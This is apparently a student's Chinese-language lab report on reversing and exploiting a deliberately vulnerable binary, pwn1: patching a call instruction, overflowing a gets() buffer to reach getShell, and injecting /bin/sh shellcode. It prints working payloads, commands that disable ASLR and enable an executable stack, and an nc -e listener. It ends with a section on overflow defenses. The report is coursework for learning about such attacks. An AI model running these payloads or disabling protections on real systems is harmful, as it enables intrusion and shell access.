1 逆向及Bof基础实践说明
–
1.1 实践目标
本次实践的对象是一个名为pwn1的linux可执行文件。
该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。
–
-
三个实践内容如下:
- 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
- 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
- 注入一个自己制作的shellcode并运行这段shellcode。
-
这几种思路,基本代表现实情况中的攻击目标:
- 运行原本不可访问的代码片段
- 强行修改程序执行流
- 以及注入运行任意代码。
–
2 直接修改程序机器指令,改变程序执行流程
-
知识要求:Call指令,EIP寄存器,指令跳转的偏移计算,补码,反汇编指令objdump,十六进制编辑工具
-
学习目标:理解可执行文件与机器指令
-
进阶:掌握ELF文件格式,掌握动态技术
–
首先,我选择直接将pwn1文件拖至kali的桌面
随后右键,选择“在这里打开终端”。
然后进行反汇编。输入:objdump -d pwn1 | more
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9ZALfmqP-1647015565148)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220308153029196.png)]
下列为实验指导博客中保留的核心代码:
root@KaliYL:~# objdump -d pwn1 | more
0804847d <getShell>:
804847d: 55 push %ebp
...
08048491 <foo>:
8048491: 55 push %ebp
...
080484af <main>:
...
80484b5: e8 d7 ff ff ff call 8048491 <foo>
80484ba: b8 00 00 00 00 mov $0x0,%eax
...
–
- 先看第12行(博客说的12行并非文件实际的12行,建议先按↓键至代码完全显示),根据内存地址80484b5,找到汇编指令"call 8048491 "
- 这条指令将调用位于地址8048491处的foo函数;
- 其对应机器指令为“e8 d7 ff ff ff”,e8即跳转之意。
- 本来正常流程,此时此刻EIP的值应该是下条指令的地址,即80484ba,但如一解释e8这条指令呢,CPU就会转而执行 “EIP + d7ffffff”这个位置的指令。“d7ffffff”是补码,表示-41,41=0x29,80484ba +d7ffffff= 80484ba-0x29正好是8048491这个值,[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GagJDQOy-1647015565149)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220308153652534.png)]
–
-
main函数调用foo,对应机器指令为“ e8 d7ffffff”,
-
实践内容1为调用getshell函数,我们想让它调用getShell,只要修改“d7ffffff”为,"getShell-80484ba"对应的补码就行。[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-muAe4Ies-1647015565150)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220308155026882.png)]getshell函数对应的地址为0804847d
-
使用Windows计算器的程序员模式,计算 47d-4ba就能得到补码,是c3ffffff。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gUZFbQ8p-1647015565151)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220308155628151.png)]
-
-
下面我们就修改可执行文件,将其中的call指令的目标地址由d7ffffff变为c3ffffff。
–
此处我们选择先复制一下pwn1到pwn2,在pwn2中进行修改
root@KaliYL:~# cp pwn1 pwn2
root@KaliYL:~# vi pwn2
以下操作是在vi内
1.按ESC键
2.输入如下,将显示模式切换为16进制模式
:%!xxd
3.查找要修改的内容
/e8d7
(博客中查找的为e8d7,若查找不到,可能是因为这个文件的空格刚好在e8和d7之间,建议更改查找的内容为f0e8)
4.找到后前后的内容和反汇编的对比下,确认是地方是正确的
5.修改d7为c3(查找完后先按esc后按i进入编辑模式,修改完后按esc退出编辑模式)
6.转换16进制为原格式
:%!xxd -r
7.存盘退出vi
:wq(一定要转换为原格式后才能存盘退出,否则会出现文件无法识别的错误)
8.再反汇编看一下,call指令是否正确调用getShell
root@KaliYL:~# objdump -d pwn2 | more
080484af <main>:
80484af: 55 push %ebp
80484b0: 89 e5 mov %esp,%ebp
80484b2: 83 e4 f0 and $0xfffffff0,%esp
80484b5: e8 c3 ff ff ff call 804847d <getShell>
80484ba: b8 00 00 00 00 mov $0x0,%eax
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-B6KBWoSJ-1647015565152)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220309162627854.png)]
可以清晰的看见这里的call已经变成了getShell函数了
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2nfN2X3M-1647015565153)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220308164305518.png)]
9.运行下改后的代码,会得到shell提示符#
root@KaliYL:~# ./pwn2
# ls
20135201_met_rtcp_136_443backdoor.exe pwn1.bak
可以看见这里的ls显示就是当前文件夹里面对应的文件:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Q2NTmWQR-1647015565154)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220308170144536.png)]
若输入./pwn2时提醒权限不够,可对文件右键后点击属性,点击权限栏,勾选此按钮
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rBUY8uQH-1647015565154)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220308170321849.png)]
3 通过构造输入参数,造成BOF攻击,改变程序执行流
–
3.1 反汇编,了解程序的基本功能
root@KaliYL:~# objdump -d pwn1 | more
8048477: 90 nop
8048478: e9 73 ff ff ff jmp 80483f0 <register_tm_clones>
== 注意这个函数getShell,我们的目标是触发这个函数 ==
0804847d <getShell>:
804847d: 55 push %ebp
804847e: 89 e5 mov %esp,%ebp
8048480: 83 ec 18 sub $0x18,%esp
8048483: c7 04 24 60 85 04 08 movl $0x8048560,(%esp)
804848a: e8 c1 fe ff ff call 8048350 <system@plt>
804848f: c9 leave
8048490: c3 ret
== 该可执行文件正常运行是调用如下函数foo,这个函数有Buffer overflow漏洞 ==
08048491 <foo>:
8048491: 55 push %ebp
8048492: 89 e5 mov %esp,%ebp
8048494: 83 ec 38 sub $0x38,%esp
8048497: 8d 45 e4 lea -0x1c(%ebp),%eax
804849a: 89 04 24 mov %eax,(%esp)
== 这里读入字符串,但系统只预留了(28)字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址 ==
804849d: e8 8e fe ff ff call 8048330 <gets@plt>
80484a2: 8d 45 e4 lea -0x1c(%ebp),%eax
80484a5: 89 04 24 mov %eax,(%esp)
80484a8: e8 93 fe ff ff call 8048340 <puts@plt>
80484ad: c9 leave
80484ae: c3 ret
080484af <main>:
80484af: 55 push %ebp
80484b0: 89 e5 mov %esp,%ebp
80484b2: 83 e4 f0 and $0xfffffff0,%esp
80484b5: e8 d7 ff ff ff call 8048491 <foo>
==上面的call调用foo,同时在堆栈上压上返回地址值:(80484ba)
80484ba: b8 00 00 00 00 mov $0x0,%eax
80484bf: c9 leave
80484c0: c3 ret
80484c1: 66 90 xchg %ax,%ax
80484c3: 66 90 xchg %ax,%ax
80484c5: 66 90 xchg %ax,%ax
80484c7: 66 90 xchg %ax,%ax
80484c9: 66 90 xchg %ax,%ax
80484cb: 66 90 xchg %ax,%ax
80484cd: 66 90 xchg %ax,%ax
80484cf: 90 nop
080484d0 <__libc_csu_init>:
–
3.2 确认输入字符串哪几个字符会覆盖到返回地址
运行这步时需检查自己的虚拟机是否有安装gdb,在终端中输入gdb -v即可,若找不到该命令,则需先进行安装操作,网上有许多教程,我下面介绍一个步骤最为简单的,依次输入下列代码即可。
sudo chmod a+w /etc/apt/sources.list
sudo chmod a-w /etc/apt/sources.list
apt-get update
apt-get install gdb
最后再通过gdb -v,显示出版本号即为安装成功。
root@KaliYL:~# gdb pwn1
(gdb) r
Starting program: /root/pwn1
1111111122222222333333334444444455555555
1111111122222222333333334444444455555555
Program received signal SIGSEGV, Segmentation fault.
0x35353535 in ?? ()
(gdb) info r
eax 0x29 41
ecx 0xffffffff -1
edx 0xf7fab870 -134563728
ebx 0x0 0
esp 0xffffd320 0xffffd320
ebp 0x34343434 0x34343434
esi 0xf7faa000 -134569984
edi 0xf7faa000 -134569984
eip 0x35353535 0x35353535 //注意EIP的值,是ASCII 5
eflags 0x10246 [ PF ZF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/pwn1
1111111122222222333333334444444412345678
1111111122222222333333334444444412345678
Program received signal SIGSEGV, Segmentation fault.
0x34333231 in ?? ()
(gdb) info r
eip 0x34333231 0x34333231
eflags 0x10246 [ PF ZF IF RF ]
(gdb)
当输入的为1111111122222222333333334444444455555555可以看到eip的值0x35353535也就是5555的ASCII码:[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-k1URuWDh-1647015565155)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220308172720805.png)]
–
如果输入字符串1111111122222222333333334444444412345678,那 1234 那四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址,输给pwn1,pwn1就会运行getShell。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PxVvXleG-1647015565156)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220308172825046.png)]
–
3.3 确认用什么值来覆盖返回地址
getShell的内存地址,通过反汇编时可以看到,即0804847d。
接下来要确认下字节序,简单说是输入11111111222222223333333344444444\x08\x04\x84\x7d,还是输入11111111222222223333333344444444\x7d\x84\x04\x08。
(gdb) break *0x804849d
Breakpoint 2 at 0x804849d
(gdb) info break
Num Type Disp Enb Address What
1 breakpoint keep y <PENDING> x804849d
2 breakpoint keep y 0x0804849d <foo+12>
(gdb) r
Starting program: /root/pwn1
Breakpoint 2, 0x0804849d in foo ()
(gdb) info r
eip 0x804849d 0x804849d <foo+12>
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3cIIpwR0-1647015565157)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220308173215474.png)]
对比之前 eip 0x34333231 0x34333231 ,正确应用输入11111111222222223333333344444444\x7d\x84\x04\x08。
–
3.4 构造输入字符串
由为我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值,所以先生成包括这样字符串的一个文件。\x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。
root@KaliYL:~# perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
–
可以使用16进制查看指令xxd查看input文件的内容是否如预期。
root@KaliYL:~# xxd input
00000000: 3131 3131 3131 3131 3232 3232 3232 3232 1111111122222222
00000010: 3333 3333 3333 3333 3434 3434 3434 3434 3333333344444444
00000020: 7d84 0408 0a }....
root@KaliYL:~#
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-l3FQKUt5-1647015565158)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220308173627810.png)]
–
然后将input的输入,通过管道符“|”,作为pwn1的输入。
root@KaliYL:~# (cat input; cat) | ./pwn1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}�
ls //这是获取Shell后我输入的指令
20135201_met_rtcp_136_443backdoor.exe ropasurusrex_
attacker.js ropasurusrex_.zip
backdoor shell.php
blpVUtjb.jpeg UserDatabase.mv.db
c webgoat-container-7.0.1-war-exec.jar
pwn1
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nxWRKBRi-1647015565158)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220308173701792.png)]
–
4. 注入Shellcode并执行
–
4.1 准备一段Shellcode
- shellcode就是一段机器指令(code)
- 通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),
- 所以这段机器指令被称为shellcode。
- 在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。
–
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\
–
关于更多Shellcode的知识,请参考Shellcode基础。许同学写的博客原链接已经失效,我通过老师的视频截图找到了CSDN上对该文章的转载地址:https://blog.csdn.net/weixin_30279751/article/details/95201204
–
4.2 准备工作
root@KaliYL:~# execstack -s pwn1 //设置堆栈可执行
root@KaliYL:~# execstack -q pwn1 //查询文件的堆栈是否可执行
X pwn1
root@KaliYL:~# more /proc/sys/kernel/randomize_va_space
2
root@KaliYL:~# echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
root@KaliYL:~# more /proc/sys/kernel/randomize_va_space
0
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nxsHRmQd-1647015565159)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311173446137.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UrHtyJg4-1647015565160)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311173455398.png)]
若提示execstack命令不存在,则需安装prelink软件包,直接搜索安装该软件包并无法安装,下面为刘老师给出的解决方法
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cTS9ym02-1647015565161)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311173310673.png)]
–
4.3 构造要注入的payload。
-
Linux下有两种基本构造攻击buf的方法:
- retaddr+nop+shellcode
- nop+shellcode+retaddr
-
因为retaddr在缓冲区的位置是固定的,shellcode要不在它前面,要不在它后面。
-
简单说缓冲区小就把shellcode放后边,缓冲区大就把shellcode放前边
–
- 我们这个buf够放这个shellcode了
- 结构为:nops+shellcode+retaddr。
- nop一为是了填充,二是作为“着陆区/滑行区”。
- 我们猜的返回地址只要落在任何一个nop上,自然会滑到我们的shellcode。
–
root@KaliYL:~# perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode
上面最后的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。
特别提醒:最后一个字符千万不能是\x0a。不然下面的操作就做不了了。
–
接下来我们来确定\x4\x3\x2\x1到底该填什么。
打开一个终端注入这段攻击buf:
root@KaliYL:~# (cat input_shellcode;cat) | ./pwn1(输入该代码后回车一次即可,无需多次回车至出现������1�Ph//shh/bin��PS��1Ұ字样,因为出现该字样后gdb调试时会attach不上进程)
–
再开另外一个终端,用gdb来调试pwn1这个进程。
//1.找到pwn1的进程号是:27728
root@KaliYL:/home# ps -ef | grep pwn1
root 27728 25675 0 10:19 pts/1 00:00:00 ./pwn1
root 27732 25991 0 10:19 pts/2 00:00:00 grep pwn1
root@KaliYL:/home#
//2.启动gdb调试这个进程
root@KaliYL:/home# gdb
(gdb) attach 27728
Attaching to process 27728
//3. 通过设置断点,来查看注入buf的内存地址
(gdb) disassemble foo
Dump of assembler code for function foo:
0x08048491 <+0>: push %ebp
0x08048492 <+1>: mov %esp,%ebp
0x08048494 <+3>: sub $0x38,%esp
0x08048497 <+6>: lea -0x1c(%ebp),%eax
0x0804849a <+9>: mov %eax,(%esp)
0x0804849d <+12>: call 0x8048330 <gets@plt>
0x080484a2 <+17>: lea -0x1c(%ebp),%eax
0x080484a5 <+20>: mov %eax,(%esp)
0x080484a8 <+23>: call 0x8048340 <puts@plt>
0x080484ad <+28>: leave
0x080484ae <+29>: ret //断在这,这时注入的东西都大堆栈上了
//ret完,就跳到我们覆盖的retaddr那个地方了
End of assembler dump.
(gdb) break *0x080484ae
Breakpoint 1 at 0x80484ae
//在另外一个终端中按下回车,这就是前面为什么不能以\x0a来结束 input_shellcode的原因。
(gdb) c
Continuing.
Breakpoint 1, 0x080484ae in foo ()
(gdb) info r esp
esp 0xffffd18c 0xffffd18c(此处由于我电脑上显示为18c,故与指导书不同)
(gdb) x/16x 0xffffd18c //看到 01020304了,再往前找
0xffffd31c: 0x01020304 0xf7fa0000 0xf7faa000 0x00000000
0xffffd32c: 0xf7e135f7 0x00000001 0xffffd3c4
(gdb) x/16x 0xffffd170 //看到9090310c了,再往前一点
0xffffd300: 0xc0319090 0x2f2f6850 0x2f686873 0x896e6962
0xffffd310: 0x895350e3 0xb0d231e1 0x9080cd0b
(gdb) x/16x 0xffffd16c //从这开始就是我们的Shellcode
0xffffd2fc: 0x90909090 0xc0319090 0x2f2f6850 0x2f686873
0xffffd30c: 0x896e6962 0x895350e3 0xb0d231e1 0x9080cd0b
0xffffd31c: 0x01020304 0xf7fa0000 0xf7faa000 0x00000000
0xffffd32c: 0xf7e135f7 0x00000001 0xffffd3c4 0xffffd3cc
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x01020304 in ?? () //这个返回地址占位也是对的
(gdb) quit
//4.我决定将返回地址改为0xffffd300。
root@KaliYL:~# perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
root@KaliYL:~# (cat input_shellcode;cat) | ./pwn1
������1�Ph//shh/bin��PS��1Ұ
�
ls
Segmentation fault
root@KaliYL:~# //唉,没成功
//5.查找原因。同上面步骤运行,gdb调试。
(gdb) attach 27883
(gdb) break *0x080484ae
Breakpoint 1 at 0x80484ae
(gdb) c
Continuing.
Breakpoint 1, 0x080484ae in foo ()
(gdb) info r
esp 0xffffd31c 0xffffd31c
eip 0x80484ae 0x80484ae <foo+29>
(gdb) x/16x 0xffffd300 //看起来buf没问题
0xffffd300: 0xc0319090 0x2f2f6850 0x2f686873 0x896e6962
0xffffd310: 0x895350e3 0xb0d231e1 0x9080cd0b 0xffffd300
0xffffd320: 0xf7fa0000 0xf7faa000 0x00000000 0xf7e135f7
0xffffd330: 0x00000001 0xffffd3c4 0xffffd3cc 0x00000000
(gdb) si //si是step instruction的简写,表示运行一条指令
0xffffd300 in ?? () //也跳转到我们的shellcode了,那我们就一步步执行看哪步错
(gdb) si
0xffffd301 in ?? () //nop
(gdb) si
0xffffd302 in ?? () //xor %eax,%eax
(gdb) si
0xffffd304 in ?? ()
(gdb) si
0xffffd305 in ?? ()
(gdb) si
0xffffd30a in ?? ()
(gdb) si
0xffffd30f in ?? ()
(gdb) si
0xffffd311 in ?? ()
(gdb) si
0xffffd312 in ?? () //push %ebx 是这句出的错
(gdb) si
Program received signal SIGSEGV, Segmentation fault.
0xffffd312 in ?? ()
(gdb) info r esp //问题呢可能是我的代码也在堆栈上,当前栈顶也在这,一push就把指令自己给覆盖了,咋能这么巧呢
esp 0xffffd310 0xffffd310
(gdb)
按照指导书找到我的进程号为22462,随后启动gdb进行调试,先attach上该进程,随后设置断点,注意在输入c(即continue那一步)时,先应返回原本进程输入一个回车!
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7d6RnUz2-1647015565162)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311191836004.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YffI0J66-1647015565162)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311193055857.png)]
此处我的esp值为ffffd18c ↑
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-G7nsgINL-1647015565163)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311193956823.png)]
看到 01020304了,再往前找 ↑
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JCBbV3v5-1647015565163)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311194036836.png)]
看到9090310c了,再往前一点 ↑
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uElVWFS4-1647015565164)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311194109950.png)]
从这开始就是我们的Shellcode ↑
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-n5Jk7o7R-1647015565165)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311194141099.png)]
这个返回地址占位也是对的 ↑
我决定将返回地址改为***0xffffd170***。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-D5T6la9b-1647015565165)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311194418842.png)]
没有成功
随后按照第一次,并从170进行单步调试
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EtojLUxO-1647015565166)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311185306394.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SrfjgypL-1647015565167)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311185503404.png)]
发现在此处出现问题
上面部分是坑,你跳了没!!
我跳了。。。
–
重新开始
结构为:anything+retaddr+nops+shellcode。
(gdb) x/16x 0xffffd31c //看到 01020304了,就是返回地址的位置。shellcode就挨着,所以地址是 0xffffd320
0xffffd31c: 0x01020304 0xf7fa0000 0xf7faa000 0x00000000
0xffffd32c: 0xf7e135f7 0x00000001 0xffffd3c4
由于我于ffffd18c处看到0x01020304,而shellcode就挨着,所以地址为0xffffd190
故我的输入为
perl -e ‘print “A” x 32;print “***\x90\xd1***\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90***\x00\x17***\xff\xff\x00”’ > input_shellcode
–
root@KaliYL:~# perl -e 'print "A" x 32;print "\x20\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
root@KaliYL:~# xxd input_shellcode
00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000020: 20d3 ffff 9090 9090 9090 31c0 5068 2f2f .........1.Ph//
00000030: 7368 682f 6269 6e89 e350 5389 e131 d2b0 shh/bin..PS..1..
00000040: 0bcd 8090 00d3 ffff 00 .........
root@KaliYL:~# (cat input_shellcode;cat) | ./pwn1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ���������1�Ph//shh/bin��PS��1Ұ
�
ls
20135201_met_rtcp_136_443backdoor.exe pwn1
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3KBp0ayw-1647015565167)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311195150809.png)]
成功!!
–
4.5 结合nc模拟远程攻击
本例中是在同一台主机上做的实验;该实验最好在互相连通的两台Linux上做,将ip地址替换为主机1的IP即可。
首先查看本机的ip地址 127.0.0.1
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5m6rnApq-1647015565168)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311200629844.png)]
主机1,模拟一个有漏洞的网络服务:
root:~# nc -l 127.0.0.1 -p 28234 -e ./pwn1
-l 表示listen, -p 后加端口号 -e 后加可执行文件,网络上接收的数据将作为这个程序的输入
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PP2fYUHi-1647015565169)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311201734508.png)]
将一个终端弄成服务器,也就是被攻击机
主机2,连接主机1并发送攻击载荷:
root@KaliYL:~# (cat input_shellcode; cat) | nc 127.0.0.1 28234
输入shell指令还没有完,这个时候因为是两个终端,地址有可能会变化,所以我开了第三个终端单步调查看nops地址
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xjUvTaG0-1647015565170)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311201803437.png)]
–
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Vk0hc6oK-1647015565170)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311201822909.png)]
这里可以算出地址为***0xffffd1a0***,注入进ret返回地址里面。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bYMRcnx6-1647015565171)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311202359732.png)]
xxd 展示input_Shell里面的内容。
5 Bof攻击防御技术
–
5.1. 从防止注入的角度。
在编译时,编译器在每次函数调用前后都加入一定的代码,用来设置和检测堆栈上设置的特定数字,以确认是否有bof攻击发生。
GCC 中的编译器堆栈保护技术
–
5.2. 注入入了也不让运行。
结合CPU的页面管理机制,通过DEP/NX用来将堆栈内存区设置为不可执行。这样即使是注入的shellcode到堆栈上,也执行不了。
root@KaliYL:~# apt-cache search execstack
execstack - ELF GNU_STACK program header editing utility
root@KaliYL:~# apt-get install execstack
root@KaliYL:~# execstack --help
Usage: execstack [OPTION...]
execstack -- program to query or set executable stack flag
-c, --clear-execstack Clear executable stack flag bit
-q, --query Query executable stack flag bit
-s, --set-execstack Set executable stack flag bit
root@KaliYL:~# execstack -s pwn1 //设置堆栈可执行
root@KaliYL:~# execstack -q pwn1 //查询文件的堆栈是否可执行
X pwn1
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XontcZFs-1647015565172)(C:\Users\LIULIULOO\AppData\Roaming\Typora\typora-user-images\image-20220311202745905.png)]
Linux可执行文件堆栈执行标识设置
–
5.3. 增加shellcode的构造难度。
shellcode中需要猜测返回地址的位置,需要猜测shellcode注入后的内存位置。这些都极度依赖一个事实:应用的代码段、堆栈段每次都被OS放置到固定的内存地址。ALSR,地址随机化就是让OS每次都用不同的地址加载应用。这样通过预先反汇编或调试得到的那些地址就都不正确了。
–
/proc/sys/kernel/randomize_va_space用于控制Linux下 内存地址随机化机制(address space layout randomization),有以下三种情况
0 - 表示关闭进程地址空间随机化。
1 - 表示将mmap的基址,stack和vdso页面随机化。
2 - 表示在1的基础上增加栈(heap)的随机化。
root@KaliYL:~# more /proc/sys/kernel/randomize_va_space
2
root@KaliYL:~# echo "0" > /proc/sys/kernel/randomize_va_space
root@KaliYL:~# more /proc/sys/kernel/randomize_va_space
0
ASLR Exploitation
实验感想
- 本次实验是本学期第一次网络攻防实验,由于之前对Linux的接触不多,很多东西都非常生疏,几乎是从0 开始学习。但顺着老师的视频与实验教程,以及对学长们的博客,最终还是较为坎坷的完成了本次实验,并且也在本篇博客中给出了一些问题的解决方法。
- 本次实验遇到的许多问题,第一个也是最大的问题便是对Linux指令的不熟悉,于是我先学习了老师推荐观看的蓝桥云课,在对指令和系统有了一定的了解之后,再开展实验。
- 第二个遇到的问题便是在查找要修改的内容时,根据实验指导书来检索却一直无法查找到,后来我发现在文件的空格位置不同,导致检索的内容也应该作出相应的修改。
- 随后遇到的问题便是gbd、prelink等软件包的安装,一开始发现这两个软件包无法直接通过apt-get install <软件包名>,随后便到网上查找了相关博客,也询问了老师,最终成功安装了实验中所需的所有安装包。
- 最后也是最难的问题则是在注入shellcode这一部分,一开始我对shellcode的原理可以说是一窍不通,在一开始对老师的讲解视频听了之后也是一知半解,但是随着实验步骤的推进,以及对代码的各种处理分析,最终实现了实验的要求,在实验的过程中是坎坷的,但是完成时的成就感也是难以言喻的。
- 本次实验让我第一次切身去接触Linux这个系统,并且对堆栈,对机器指令等等一系列概念都有了更深刻的理解。在以后的学习中我会尽力去了解吸收课上乃至课外的知识,真正做到学有所得学有所获。
